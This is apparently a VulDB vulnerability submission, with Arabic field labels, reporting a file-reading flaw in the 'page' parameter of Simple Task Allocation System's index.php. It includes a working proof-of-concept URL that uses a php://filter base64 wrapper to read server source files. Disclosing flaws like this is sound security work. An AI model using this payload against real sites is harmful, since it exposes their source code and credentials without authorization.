| عنوان | There is a file reading vulnerability in index.php of Simple Task Allocation System |
|---|
| الوصف | The page parameter in line 77 of Simple Task Allocation System's index.php is controllable, and users can construct malicious urls to achieve high-risk vulnerabilities in file reading
http://127.0.0.1/php-sqlite-task-allocation-system/?page=users
can be constructed as
http://127.0.0.1/php-sqlite-task-allocation-system/?page=php://filter/read=convert.base64-encode/resource=users
source url:https://www.sourcecodester.com/php/16358/simple-task-allocation-system-using-php-and-sqlite-source-code-free-download.html |
|---|
| المصدر | ⚠️ https://github.com/Pe4cefulSnow/CVE-Advisory/blob/main/uploadcve.md |
|---|
| المستخدم | Pe4cefulSnow (UID 34389) |
|---|
| ارسال | 31/03/2023 11:32 AM (3 سنوات منذ) |
|---|
| الاعتدال | 01/04/2023 10:39 AM (23 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 224724 [SourceCodester Simple Task Allocation System 1.0 index.php page الكشف عن المعلومات] |
|---|
| النقاط | 20 |
|---|